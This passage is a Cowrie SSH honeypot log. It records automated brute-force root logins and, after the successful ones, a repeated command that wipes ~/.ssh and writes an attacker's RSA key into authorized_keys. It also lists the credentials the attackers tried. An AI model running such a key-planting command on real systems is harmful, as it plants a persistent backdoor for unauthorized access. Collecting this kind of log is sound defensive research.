openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:25.692109Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:23:26.792500Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:23:27.340698Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:23:27.341511Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:23:27.342844Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:27.608774Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:23:28.245856Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:23:28.246644Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:23:28.513687Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:28.514693Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42446,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea9a998b53ae","protocol":"ssh","message":"New connection: 212.227.235.229:42446 (1.2.3.4:22) [session: ea9a998b53ae]","sensor":"my-vps","timestamp":"2025-08-26T04:23:28.761142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:28.762122Z","src_ip":"212.227.235.229","session":"ea9a998b53ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:29.009950Z","src_ip":"212.227.235.229","session":"ea9a998b53ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:23:30.042333Z","src_ip":"212.227.235.229","session":"ea9a998b53ae"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:31.293461Z","src_ip":"212.227.235.229","session":"ea9a998b53ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"4456b2c8f2a2","protocol":"ssh","message":"New connection: 212.227.235.229:42452 (1.2.3.4:22) [session: 4456b2c8f2a2]","sensor":"my-vps","timestamp":"2025-08-26T04:23:31.536862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:31.538118Z","src_ip":"212.227.235.229","session":"4456b2c8f2a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:31.783097Z","src_ip":"212.227.235.229","session":"4456b2c8f2a2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:23:32.805699Z","src_ip":"212.227.235.229","session":"4456b2c8f2a2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:33.053151Z","src_ip":"212.227.235.229","session":"4456b2c8f2a2"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:33.054089Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50122,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8cb64446d72","protocol":"ssh","message":"New connection: 103.217.145.104:50122 (1.2.3.4:22) [session: c8cb64446d72]","sensor":"my-vps","timestamp":"2025-08-26T04:23:42.513413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:42.516608Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:42.789631Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.login.success","username":"root","password":"sangoma","message":"login attempt [root/sangoma] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:23:43.886614Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:23:44.455095Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:23:44.455819Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:23:44.456686Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:44.731650Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:23:45.421759Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:23:45.422417Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:23:45.700355Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:45.701243Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50126,"dst_ip":"1.2.3.4","dst_port":22,"session":"be0a50336fa4","protocol":"ssh","message":"New connection: 103.217.145.104:50126 (1.2.3.4:22) [session: be0a50336fa4]","sensor":"my-vps","timestamp":"2025-08-26T04:23:45.959062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:45.960704Z","src_ip":"103.217.145.104","session":"be0a50336fa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:46.224864Z","src_ip":"103.217.145.104","session":"be0a50336fa4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:23:47.273536Z","src_ip":"103.217.145.104","session":"be0a50336fa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34566,"dst_ip":"1.2.3.4","dst_port":22,"session":"98b16c78b916","protocol":"ssh","message":"New connection: 212.227.235.229:34566 (1.2.3.4:22) [session: 98b16c78b916]","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.426939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.427871Z","src_ip":"212.227.235.229","session":"98b16c78b916"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.535629Z","src_ip":"103.217.145.104","session":"be0a50336fa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.710346Z","src_ip":"212.227.235.229","session":"98b16c78b916"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50142,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ffb1f4a2503","protocol":"ssh","message":"New connection: 103.217.145.104:50142 (1.2.3.4:22) [session: 5ffb1f4a2503]","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.798636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:48.799900Z","src_ip":"103.217.145.104","session":"5ffb1f4a2503"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:49.066171Z","src_ip":"103.217.145.104","session":"5ffb1f4a2503"}
{"eventid":"cowrie.login.failed","username":"teest","password":"teest123","message":"login attempt [teest/teest123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:23:49.879868Z","src_ip":"212.227.235.229","session":"98b16c78b916"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:23:50.143331Z","src_ip":"103.217.145.104","session":"5ffb1f4a2503"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:50.587659Z","src_ip":"103.217.145.104","session":"5ffb1f4a2503"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:50.588651Z","src_ip":"103.217.145.104","session":"c8cb64446d72"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:51.164733Z","src_ip":"212.227.235.229","session":"98b16c78b916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52420,"dst_ip":"1.2.3.4","dst_port":22,"session":"e826a857d76c","protocol":"ssh","message":"New connection: 212.227.235.229:52420 (1.2.3.4:22) [session: e826a857d76c]","sensor":"my-vps","timestamp":"2025-08-26T04:23:55.738423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:55.739578Z","src_ip":"212.227.235.229","session":"e826a857d76c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:23:55.984438Z","src_ip":"212.227.235.229","session":"e826a857d76c"}
